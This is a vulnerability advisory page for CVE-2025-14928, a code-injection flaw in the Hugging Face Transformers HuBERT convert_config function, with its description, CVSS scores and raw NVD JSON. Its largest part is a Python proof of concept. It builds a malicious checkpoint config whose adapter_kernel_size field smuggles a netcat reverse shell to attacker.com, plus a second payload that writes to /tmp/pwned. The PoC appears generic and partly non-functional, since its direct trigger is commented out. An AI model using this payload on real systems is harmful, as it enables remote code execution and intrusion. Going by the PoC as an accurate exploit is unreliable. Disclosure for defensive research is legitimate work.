Security Vulnerability Report
中文
CVE-2025-14928 CVSS 7.8 HIGH

CVE-2025-14928

Published: 2025-12-23 21:15:48
Last Modified: 2026-01-21 16:43:32
Source: [email protected]

Description

Hugging Face Transformers HuBERT convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28253.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:transformers:4.57.0:*:*:*:*:*:*:* - VULNERABLE
Hugging Face Transformers < 修复版本
Hugging Face Transformers HuBERT convert_config 函数

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14928 PoC - Malicious HuBERT checkpoint configuration # This PoC demonstrates the code injection vulnerability in convert_config import json import os def create_malicious_checkpoint(): """ Create a malicious checkpoint that exploits the convert_config code injection vulnerability in Hugging Face Transformers HuBERT """ # Malicious payload - reverse shell connection # This will be executed when convert_config processes the config malicious_code = "__import__('os').system('nc -e /bin/bash attacker.com 4444')" # Create malicious config.json for HuBERT model malicious_config = { "model_type": "hubert", "hidden_size": 768, "num_hidden_layers": 12, "vocab_size": 50265, "attention_heads": 12, # Inject malicious code through config parameter "adapter_kernel_size": f"'; {malicious_code}; #", "adapter_stride": 256, "mask_time_length": 10, "mask_time_prob": 0.75, "feature_projection_input_dim": 80, "hidden_act": "gelu", "initializer_range": 0.02, "intermediate_size": 3072, "layer_norm_eps": 1e-05, "num_conv_pos_embedding_groups": 16, "num_conv_pos_embeddings": 128, "output_hidden_size": 256 } # Save malicious checkpoint checkpoint_dir = "./malicious_hubert_checkpoint" os.makedirs(checkpoint_dir, exist_ok=True) config_path = os.path.join(checkpoint_dir, "config.json") with open(config_path, 'w') as f: json.dump(malicious_config, f, indent=2) print(f"[+] Malicious checkpoint created at: {checkpoint_dir}") print(f"[+] Config file: {config_path}") print(f"[!] When loaded with convert_config, the injected code will execute") return checkpoint_dir # Alternative: Direct exploitation through convert_config function def exploit_direct(): """ Direct exploitation scenario """ try: from transformers import HubertModel, HubertConfig # Create config with malicious parameter config = HubertConfig() # Malicious payload payload = "'; __import__('os').system('id > /tmp/pwned'); #" # This triggers the vulnerability in convert_config # config.adapter_kernel_size = payload # Trigger point print("[+] Exploit configuration prepared") print(f"[!] Payload: {payload}") except ImportError: print("[-] transformers library not installed") if __name__ == "__main__": create_malicious_checkpoint() exploit_direct()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14928", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:48.110", "lastModified": "2026-01-21T16:43:32.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Transformers HuBERT convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint.\n\nThe specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28253."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:4.57.0:*:*:*:*:*:*:*", "matchCriteriaId": "5540780B-B22B-4304-86AB-62CD30684847"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1146/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.